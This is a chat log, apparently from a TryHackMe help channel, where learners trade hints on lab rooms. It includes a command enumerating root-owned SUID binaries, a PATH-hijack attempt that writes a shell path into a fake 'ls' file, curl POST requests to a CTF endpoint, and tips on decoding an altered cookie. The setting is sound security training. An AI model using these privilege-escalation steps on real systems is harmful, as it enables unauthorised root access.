Struggling to understand ||find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null|| which is what I see many people use for this
I do however understand its output
Yeah the find command won't get you anywhere here either, although I would recommend https://tryhackme.com/room/thefindcommand for that one
You're on the right lines with the first one, but it ain't BOF
Nah, that's a side thing. It won't help with YOTR
@inland onyx So it is a ||/usr/bin/sudo|| thing I gotta find
Potentially...
I'm having a major brainfart on the (excellent) commonlinuxprivesc room [Task 9] Exploiting PATH Variable question number 4. The rest of the room is finished and I can't seem to get this right. My best failed attempt was ||echo ./bin/bash > ls|| Can anyone help me so I can have some closure
@white salmon It may help others if you mention which topic, task and question you are on?
Darkfighter hi again
same issue with the flag with curl -x post
still no success
@white salmon The thing tells you if you're doing it wrong
Break down the command into the parts
What URL? What data? What verb?
hi, I am trying the small CTF in Web Fundamentals
I know.
I have to get the POST flag from http://x.x.x.x /ctf/post
I am doing `curl -X POST http://x.x.x.x /ctf/post`
Ok, you need to look at the man page for curl
I tried --data but I don't know what to add
And how URLs are formed
okay...
And how to specify data
And read the question again
It tells you exactly what the server needs in order to give you the flag, you just have to format the command
@inland onyx got root
Ey!
user to root was easier than getting the initial foothold imo :p
but had a lot of fun
I wish I could say the same about root haha
@stuck fractal "you need the right request body" ?
Sounds like you have the wrong request body
does that mean the <> format?
right, that's HTML
@white salmon So, what's the question?
it seems I am missing some information, I already got the other flags. Just want to know what I am doing wrong...
If it's saying you have the wrong request body, that means you have the wrong request body
So however you're specifying it, it's not quite right
Or what you're specifying isn't what you've been told to use
I used `--data ''`. I used `--data 'thm{}'`. Seems like I am on the right path, I just need to ask what I need from the ctf
I will dig deeper
thank you again, I will finally get it
Hello. Room rpnessus. Task 4 / Question 7. I've done the scan. But no vulnerabilities found, only info
@white salmon Data is what you send to the server.
Why would you send it the flag that you don't have?
@inland onyx oh my god this is so embarrassing :)) thank you very much, I overlooked the obvious :))
@stuck fractal thanks man, I didn't read the whole sentence above and I rushed to the answer without reading properly
many thanks again guys.
Hi guys! I'm playing the Advent - Day 1, for some reason my modified cookie doesn't work, any pointers?
Make sure there's no 7 in your decoded cookie
That was it indeed
The room also accepted my answer including a 7
for the fixed part
The rooms have answer tolerance
@lyric pollen In future, CyberChef
Some of the online converters are bad and add 7s
`echo "" | base64 -d` might be better for the future, was just reading up on it
@lyric pollen That'll throw an error too
Or rather
It will when you reconvert
When you're converting back, use `echo -n "" | base64`
Hey guys. Having trouble with room rpnessus, Task 4 in general. It says to configure a network scan. That's what I do, but when I scan, I have no vulnerabilities. I see there is a plugin tab when configuring the scan. Do I have to manually select which plugin it must use?
got my answer. Plugins are read-only when doing a basic network scan. So... why don't I have vulnerabilities in the report?
@inland onyx I got that flag from Tony the Tiger, I was trying harder than I should. I used stegoveritas and got a huge wall
Hello guys and gals
has anyone tried inoculation?
I got the user flag weeks ago and I didn't take notes
@white salmon cries
Seems like the burpsuite room https://tryhackme.com/room/learnburp is missing some tasks.
Does everyone only have 3 tasks?
The 3rd task also stops in the middle of something.
So, I'm doing rpnessus. I found a write-up on it, and I definitely don't have the same result after the basic network scan (in which you can't really turn on/off options... so it's difficult to mess up)
And about the web server version, when checking the dev console, there's Apache 2.4.7... but that's not the right answer ^^
same thing with the PHP version... the version from the dev console is not right
it's literally right there